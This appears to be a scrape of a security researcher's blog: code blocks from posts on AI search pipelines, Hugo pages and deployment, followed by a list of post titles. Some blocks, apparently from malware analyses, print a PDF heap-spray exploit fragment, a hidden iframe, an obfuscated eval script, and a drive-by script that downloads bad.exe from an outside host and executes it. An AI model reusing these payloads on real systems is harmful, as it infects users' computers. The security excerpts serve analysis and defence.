Niels Provos

This article was drafted with the assistance of Claude.

1

app.post('/api/promo/validate', async (req: Request, res: Response) => {

1
2
3
4

authApp.unauthenticated_post(
    '/api/promo/validate',
    (req, res, next) => aggressiveUnauthenticatedRateLimiter(req, res, next!),
    async (req: Request, res: Response) => {

1
2
3
4
5

authApp.authenticated_post(
    '/api/promo/validate',
    AuthType.AUTHENTICATED_USER,
    (req, res, next) => aggressiveAuthenticatedRateLimiter(req, res, next!),
    async (req: Request, res: Response) => {

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

from pydantic import Field
from planai import Task

class Question(Task):
    question: str = Field(..., description="The question to be answered")

class SearchQueries(Task):
    queries: List[str] = Field(..., description="The search queries to execute")

class SearchResult(Task):
    title: str
    link: str
    snippet: str

class FilteredResults(Task):
    results: List[SearchResult]
    explanation: str = Field(
        ..., description="Explanation for why these results were selected"
    )

class PageResult(Task):
    url: str
    title: str
    content: Optional[str]

class ConsolidatedPages(Task):
    pages: List[PageResult]


class LLMAnswer(Task):
    answer: str

class Answer(Task):
    question: str
    answer: str
    sources: List[str]

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

class QuestionToQueries(CachedLLMTaskWorker):
    """
    Converts user questions into search queries using an LLM.
    Uses caching to avoid redundant LLM calls.
    """
    output_types: List[Type[Task]] = [SearchQueries]
    llm_input_type: Type[Task] = Question
    prompt: str = dedent(
        """
        Generate two distinct search queries to find information to answer this question:
        {question}

        Guidelines:
        - Queries should be specific and focused
        - Use different angles/approaches in each query
        - Return exactly 2 queries
    """
    ).strip()

    def pre_process(self, task: Question):
        return None

    def format_prompt(self, task: Question) -> str:
        return self.prompt.format(question=task.question)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

class SearchExecutor(CachedTaskWorker):
    """
    Exectures a web search for each query and combines all the unique results
    """
    output_types: List[Type[Task]] = [SearchResults]
    max_results: int = Field(10, description="Maximum number of results per query")

    def consume_work(self, task: SearchQueries):
        all_results = []
        for query in task.queries:
            results = SerperGoogleSearchTool().search_internet(
                query, num_results=self.max_results, print_func=self.print
            )
            all_results.extend(
                [SearchResult(title=r["title"], link=r["link"], snippet=r["snippet"])
                    for r in results]
            )

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

class ResultFilter(CachedLLMTaskWorker):
    output_types: List[Type[Task]] = [FilteredResults]
    llm_input_type: Type[Task] = SearchResults
    prompt: str = dedent(
        """
        Analyze these search results to find the 5 most promising sources to answer this question:
        {question}

        Guidelines:
        - Select credible and relevant sources
        - Prefer sources that directly address the question
        - Avoid duplicates and similar content
    """
    ).strip()

    def format_prompt(self, task: SearchResults) -> str:
        question = task.find_input_task(Question)
        if not question:
            raise ValueError("No question found in input tasks")
        return self.prompt.format(question=question.question)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

def extract_markdown_from_pdf(pdf_path: str, print_func: callable = print) -> str:
    try:
        md_text = pymupdf4llm.to_markdown(pdf_path, show_progress=False)
        return md_text
    except Exception as e:
        print_func(f"Error extracting text from PDF: {e}")
        return None

class PageFetcher(CachedTaskWorker):
    output_types: List[Type[Task]] = [PageResult]

    def consume_work(self, task: SearchResult):
        content = WebBrowser.get_markdown_from_page(
            task.link,
            extract_markdown_from_pdf=extract_markdown_from_pdf,
            print_func=self.print,
        )

        # code to ask the user for data on fetch failures removed

        if content:
            # Remove markdown links while preserving the link text
            content = re.sub(r"\[([^\]]+)\]\([^)]+\)", r"\1", content)

        result = PageResult(url=task.link, title=task.title, content=content)
        self.publish_work(task=result, input_task=task)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

class PageConsolidator(JoinedTaskWorker):
    output_types: List[Type[Task]] = [ConsolidatedPages]
    join_type: Type[TaskWorker] = InitialTaskWorker

    def consume_work_joined(self, task: List[PageResult]):
        pages = []
        for entry in task:
            pages.append(entry)

        self.publish_work(task=ConsolidatedPages(pages=pages), input_task=task[0])

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

class QuestionAnswerer(CachedLLMTaskWorker):
    output_types: List[Type[Task]] = [Answer]
    llm_input_type: Type[Task] = ConsolidatedPages
    llm_output_type: Type[Task] = LLMAnswer
    prompt: str = dedent(
        """
        Answer this question using the provided source materials:
        Question: {question}

        Guidelines:
        - Be specific and direct in your answer
        - Use information only from the provided sources
        - Cite sources when making specific claims
        - If the sources don't contain enough information, acknowledge the limitations
    """
    ).strip()

    def format_prompt(self, task: ConsolidatedPages) -> str:
        question = task.find_input_task(Question)
        if not question:
            raise ValueError("No question found in input tasks")
        return self.prompt.format(question=question.question)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

def get_question_graph(llm_small, llm_reasoning):
    graph = Graph(name="Question Answering")
    graph.add_workers(
        question_to_queries,
        search_executor,
        result_filter,
        search_result_splitter,
        page_fetcher,
        page_consolidator,
        question_answerer,
    )
    graph.set_dependency(question_to_queries, search_executor).next(result_filter)
        .next(search_result_splitter).next(page_fetcher)
        .next(page_consolidator).next(question_answerer).sink(Answer)
    return graph

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

def main():
    llm_small = llm_from_config(provider="openai", model_name="gpt-4o-mini")
    llm_reasoning = llm_from_config(provider="openai", model_name="gpt-4o")
    graph = get_question_graph(llm_small, llm_reasoning=llm_reasoning)
    
    initial_task = Question(question="When will Friedman's doctrine end?")
    graph.run(
        initial_tasks=[(graph.get_worker_by_input_type(Question), initial_task)],
        run_dashboard=True,
    )

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

---
title: "Artist Name's Music Links"
date: "2024-11-29"
layout: links
hideHeader: true
avatar: "/images/artist-logo.png"
bio: "Your artist bio goes here. Make it compelling and brief."
social:
  - name: Instagram
    url: https://www.instagram.com/yourhandle/
    icon: fab fa-instagram
  - name: Facebook
    url: https://www.facebook.com/yourpage/
    icon: fab fa-facebook
  - name: YouTube
    url: https://www.youtube.com/@yourchannel
    icon: fab fa-youtube
links:
  - name: Bandcamp
    url: https://yourbandcamp.com/
  - name: Spotify
    url: https://open.spotify.com/artist/yourid
  - name: Youtube Music
    url: https://music.youtube.com/channel/yourid
  - name: Soundcloud
    url: https://soundcloud.com/yourprofile
  - name: Apple Music
    url: https://music.apple.com/us/artist/yourname/yourid
---

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

{{ define "main" }}
<div class="min-h-[calc(100vh-theme(space.64))] w-full bg-gradient flex flex-col items-center px-8 py-4">
    <div class="max-w-2xl w-full flex flex-col items-center relative z-10">
        <!-- Avatar -->
        <div class="w-32 h-32 rounded-full overflow-hidden mt-4 sm:w-40 sm:h-40">
            <img src="{{ .Params.avatar }}" alt="{{ .Title }}" class="w-full h-full object-cover">
        </div>

        <!-- Title -->
        <h1 class="text-xl font-bold text-white mt-3 text-center">
            {{ .Title }}
        </h1>

        <!-- Bio -->
        <p class="text-white/75 text-center mt-1.5 whitespace-pre-line">
            {{ .Params.bio }}
        </p>

        <!-- Social Links -->
        <div class="flex flex-wrap gap-3 mt-4 mb-4">
            {{ range .Params.social }}
            <a href="{{ .url }}" target="_blank" rel="noopener"
               class="w-8 h-8 rounded-full bg-black/80 text-white flex items-center justify-center hover:shadow-lg transition-shadow">
                <i class="{{ .icon }}"></i>
            </a>
            {{ end }}
        </div>

        <!-- Main Links -->
        <div class="flex flex-col gap-3 w-full mt-4 mb-4">
            {{ range .Params.links }}
            <a href="{{ .url }}" target="_blank" rel="noopener"
               class="w-full min-h-12 bg-black/80 text-white rounded flex items-center justify-center px-2 py-2 hover:shadow-lg transition-shadow">
                <span class="text-center">{{ .name }}</span>
            </a>
            {{ end }}
        </div>
    </div>
</div>
{{ end }}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

@layer components {
    .bg-gradient {
        @apply bg-black bg-opacity-50 flex-1;
        background-image: linear-gradient(
            to bottom,
            rgba(0, 0, 0, 0.7),
            rgba(0, 0, 0, 0.5)
        ),
        url('/images/background.webp');
        background-size: cover;
        background-position: center;
        background-repeat: no-repeat;
    }
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

<!doctype html>
<html lang="{{ .Language.Lang }}" class="scroll-smooth">
  <head>
    {{ partial "head.html" . }}
  </head>
  <body class="bg-black min-h-screen flex flex-col">
    {{ if not .Params.hideHeader }}
      {{ partial "header.html" . }}
    {{ end }}
    <main class="flex-1">
      {{ block "main" . }}{{ end }}
    </main>
    {{ partial "footer.html" . }}
  </body>
</html>

1
2
3
4
5
6
7
8
9

import streamlit as st
from your_script import process_image

num_slices = st.slider("Number of slices", 2, 10, 5, 1)
use_simple = st.checkbox("Use simple thresholds")

process_image("input.png", "output", num_slices, use_simple, ...)

st.image("output/rendered_image.png")

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

image_input = gr.Image(label="Input Image")
num_slices_slider = gr.Slider(minimum=2, maximum=10, step=1, value=5, label="Number of Slices")
use_simple_thresholds_checkbox = gr.Checkbox(label="Use Simple Thresholds")
skip_depth_map_checkbox = gr.Checkbox(label="Skip Depth Map Generation")
skip_image_slices_checkbox = gr.Checkbox(label="Skip Image Slices Generation")
skip_image_animation_checkbox = gr.Checkbox(label="Skip Image Animation Generation")

image_output = gr.Image(label="Output Image")

inputs = [
    image_input,
    num_slices_slider,
    use_simple_thresholds_checkbox,
    skip_depth_map_checkbox,
    skip_image_slices_checkbox,
    skip_image_animation_checkbox
]

title = "2.5D Parallax Animation Generator"
description = "Upload an image and adjust parameters to generate a 2.5D parallax animation."

gr.Interface(fn=update_image, inputs=inputs, outputs=image_output, title=title, description=description).launch()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

app.layout = html.Div([
    html.Img(id='clickable-image', src='/path/to/image.png'),
    html.Div(id='output-container')
])

@app.callback(
    Output('output-container', 'children'),
    [Input('clickable-image', 'n_clicks')],
    [State('clickable-image', 'n_clicks_timestamp')]
)
def display_click_data(n_clicks, n_clicks_timestamp):
    if n_clicks:
        return f'Image clicked at {n_clicks_timestamp}'
    return "Image not clicked yet"

1
2
3
4
5
6
7
8
9

@app.callback(
    Output('slider-container', 'children'),
    [Input('num-slider', 'value')]
)
def update_sliders(number_of_sliders):
    sliders = []
    for i in range(number_of_sliders):
        sliders.append(dcc.Slider(id=f'slider-{i}'))
    return html.Div(sliders)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

@app.callback(
    Output('thresholds-container', 'children'),
    Input('update-thresholds-container', 'data'),
    State('application-state-filename', 'data'),
    prevent_initial_call=True
)
def update_thresholds_html(value, filename):
    state = AppState.from_cache(filename)
    thresholds = []
    for i in state.num_slices:
        thresholds.append(html.Div([
            dcc.Slider(
                id={'type': 'threshold-slider', 'index': i},
                min=0,
                max=255,
                value=state.imgThresholds[i],
            )
        ]))

    return thresholds

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

import numba as nb

@nb.jit(nopython=True, parallel=True)
def fill_nearest_alpha(alpha, nearest_alpha, height, width):
    for i in nb.prange(height):
        for j in range(width):
            if alpha[i, j] == 255:
                nearest_alpha[i, j] = np.array([[i, j], [i, j], [i, j], [i, j]])
            else:
                # other code

# Initialize the nearest_alpha array with -1 (indicating no nearest alpha pixel)
nearest_alpha = np.full((height, width, 4, 2), -1, dtype=np.int64)

fill_nearest_alpha(alpha, nearest_alpha, height, width)

1
2
3
4
5

r  = requests.get("https://www.<yoursite>.org/rss.php?all=1&version=2.0")
raw_feed = r.content
feed = feedparser.parse(raw_feed, sanitize_html=False)
posts = feed.entries
print("total posts", len(posts))

1
2
3
4

workdir = Path("../../<yoursite>.github.io/content/post")
imgdir = Path('../../<yoursite>.github.io/static/images')
workdir.mkdir(parents=True)
imgdir.mkdir(parents=True)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

for p in tqdm(posts, desc="creating posts"):
    title = p.title
    slug = p.title.lower().replace(' ', '-').replace('--', '-')
    slug = re.sub('[^a-z0-9-]', '', slug)
    postpath = workdir / f"{slug}" / "index.md" 
    
    date = p.published
    if 'tags' in p:
        tags = [t['term'] for t in p.tags]
    else:
        tags = []
    content = p.summary

    # dl images and get info
    img_info = get_images(content, imgdir)

    # markdown
    md = markdownify(content).replace('\n\n', '\n')   

    # replace with relative images
    for i in img_info:
        md = md.replace(i['url'], f"/static/images/{i['fname']}")

    with codecs.open(postpath, 'w+', encoding='utf-8') as o:
        o.write('---\n')
        o.write(f'layout: post\n')
        o.write(f'title: {title}\n')
        o.write(f'slug: {slug}\n')
        o.write(f'permalink: posts/{slug}\n')
        o.write("author: <yourname>\n")
        o.write(f'date: {date}\n')     
        o.write(f'tags: {",".join(tags)}\n')        
        o.write('---\n')
        o.write(md)

1
2
3
4
5
6
7

- name: Deploy to GH Pages 🚀
    uses: JamesIves/github-pages-deploy-action@4.1.4
    with:
        branch: gh-pages
        folder: public
        clean: true
        single-commit: true

1
2
3
4
5
6
7

- name: Deploy to Firebase
    uses: FirebaseExtended/action-hosting-deploy@v0
    with:
    repoToken: '${{ secrets.GITHUB_TOKEN }}'
    firebaseServiceAccount: '${{ secrets.FIREBASE_SERVICE_ACCOUNT_PROVOSBLOG }}'
    channelId: live
    projectId: <firebaseprojectid>

1
2
3
4
5
6
7

$ docker run -it -p 1313:1313 1cef71c9fd7a /bin/bash
$ cd server/<yousite>.github.io/
$ hugo server --bind=0.0.0.0
Change detected, rebuilding site.
2022-12-18 23:51:51.511 +0000
Source changed WRITE "/server/<yoursite>.github.io/content/post/migrating-to-hugo/index.md"
Total in 211 ms

1
2

/Fields [18 0 R] /DA (/Helv 0 Tf 0 g ) /XFA [(preamble) 8 0 R (config) 9 0 R (template)
10 0 R (PDFSecurity) 11 0 R (dataset) 12 0 R (xfdf) 13 0 R (form) 14 0 R (postamble) 15 0 R] >>

1
2
3
4
5
6
7
8
9

if (app.viewerVersion < 9.0)
  tiffData = generateBase64EncodedTiff1();
  shellcode = generateShellcode1();
else
  tiffData = generateBase64EncodedTiff2();
  shellcode = generateShellCode2();

sprayMemory(hexDecode(shellcode));
hunkOar.rawField = tiffData;

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38


static void
init_feedback_service(struct event_base *ev_base,
    struct evdns_base *dns)
{
   int rc;
   struct bufferevent *bev;
   SSL_CTX *ssl_ctx;
   SSL *ssl;

   ssl_ctx = SSL_CTX_new(SSLv3_method());

   rc = SSL_CTX_use_certificate_file(ssl_ctx, "my_apple_cert_key.pem",
       SSL_FILETYPE_PEM);
   if (rc != 1) {
       errx(EXIT_FAILURE, "Could not load certificate file");
   }
   rc = SSL_CTX_use_PrivateKey_file(ssl_ctx, "my_apple_cert_key.pem",
       SSL_FILETYPE_PEM);
   if (rc != 1) {
       errx(EXIT_FAILURE, "Could not load private key file");
   }

   ssl = SSL_new(ssl_ctx);
   bev = bufferevent_openssl_socket_new(ev_base, -1, ssl,
       BUFFEREVENT_SSL_CONNECTING, BEV_OPT_CLOSE_ON_FREE);
   bufferevent_setcb(bev, feedback_read_cb, NULL,
       feedback_event_cb, NULL);
   rc = bufferevent_socket_connect_hostname(bev, dns, AF_INET,
       "feedback.sandbox.push.apple.com", 2196);
   if (rc < 0) {
       warnx("could not connect to feedback service: %s",
             evutil_socket_error_to_string(EVUTIL_SOCKET_ERROR()));
       bufferevent_free(bev);
       return;
   }
   bufferevent_enable(bev, EV_READ);
}

1
2

  
<iframe src="http://www.somehost.com/ment/" width="0" height="0"></iframe>  

1
2
3
4
5
6
7
8
9

  
<script>  
t="60,115,99,114,105,112,116,32,108,97,110,103,118,97,103,  
101,61,106,97,118,97,115,99,114,105,112,116,62,13,  
10,118,97,114,32,117,114,108,44,112,97,116,104,44,118,97,114,49,44,118,97,  
114,50,44,118,97,  
[many more lines of numbers]  
t=eval("String.fromCharCode("+t+")");  
document.write(t);</script>  

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

  
<script language=javascript> var url,path,var1,var2,var3,var4;  
url="http://www.somehost.com/ment/bad.exe";  
path="C:\\windows\\IsUno104.exe"; var1="Microsoft.xmlhttp";  
var2="Adodb.Stream"; var3="Shell.Application";  
var var4_1="clsid:BD96C556-65A"; var var4_2="3-11D0-983A-00C04FC29E36";  
var4=var4_1+var4_2;  
try{var ado=(document.createElement("object"));  
ado.setAttribute("classid",var4); var xml=ado.CreateObject(var1,"");  
var as=ado.createobject(var2,""); xml.Open("GET",url,0); xml.Send();  
as.type=1;as.open();as.write(xml.responseBody);   
as.savetofile(path,2);as.close();var shell=ado.createobject(var3,"");  
shell.Shell(path,"","","open",0);}catch(e){};  
</script>  

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

$ stegdetect \*.jpg
cold\_dvd.jpg : outguess(old)(\*\*\*) jphide(\*)
dscf0001.jpg : negative
dscf0002.jpg : jsteg(\*\*\*)
dscf0003.jpg : jphide(\*\*\*)
\[...\]
$ stegbreak -tj dscf0002.jpg
Loaded 1 files...
dscf0002.jpg : jsteg(wonderland)
Processed 1 files, found 1 embeddings.
Time: 36 seconds: Cracks: 324123,   8915 c/s

Niels Provos

The Case For Open-Weight Models And Why We Can't Trust Frontier Labs

The compiler that lies

The model enforces someone else’s policy

Access can vanish overnight

Open weights move the model inside your trust boundary

Frontier models outside the trust boundary

The Day After the Zero-Days

A workflow that does not require a frontier model

Why patch-cadence defense is failing

Security invariants

What changed

The day after

The Arrangement

Finding Zero-Days with Any Model

Orchestrating Vulnerability Discovery

Replicating the 1998 OpenBSD Discovery

Autonomous Discovery and Scaling Defense

IronCurtain: A Personal AI Assistant Built Secure from the Ground Up

The Architectural Approach

Policy in Plain English

What It Can Do Today

The Threat Model

What’s Next

I Had to Write a Script to Submit My Medical Claims to Cigna

The Quiet Logic of Making Things Difficult

What It Actually Takes to Submit a Claim

Automating the Nightmare

The Code Is Not Just Hostile to Bots. It Is Hostile to Humans.

AI Made This Possible

The Bigger Picture

The Dangers of Coding With AI

Security-First Abstractions

Three Rounds to Get It Right

The Bigger Picture

Ear Training App

Ear Training App

The Need To Do Good

Deepseek and the Strawberry

Measuring Hosting Latency Across Different Platforms

Building a Generative AI Search Engine with PlanAI

Building a Generative AI Search Engine with PlanAI

Prerequisites

Architecture Overview

Defining Data Models with Pydantic

Generating Search Queries

Executing Searches

Filtering Results

Content Fetching with Playwright

Consolidating All Sources

Generating the Final Answer

Putting It All Together

Running the Search Engine

Example Case

Extensions

Conclusion

Build Your Own Music Links Page with Hugo

The Final Result

Prerequisites

File Structure

The Content File

The Layout Template

Styling with Tailwind

Base Template Modifications

Background Image

Conclusion

Introducing PlanAI: Streamlining Task Automation with AI

Key Features

The Role of Input Provenance

Practical Application: Textbook Q&A Generation

Automating Prompt Optimization

Conclusion

Comparison with Alternatives

Activ8te: Am I AI?

Design and Order a Custom T-Shirt in 15 Minutes with AI Tools

Prepare Context

Create Backgrounds

Generate Logo Prompts

Create the Main Logo

Compose in Image Editor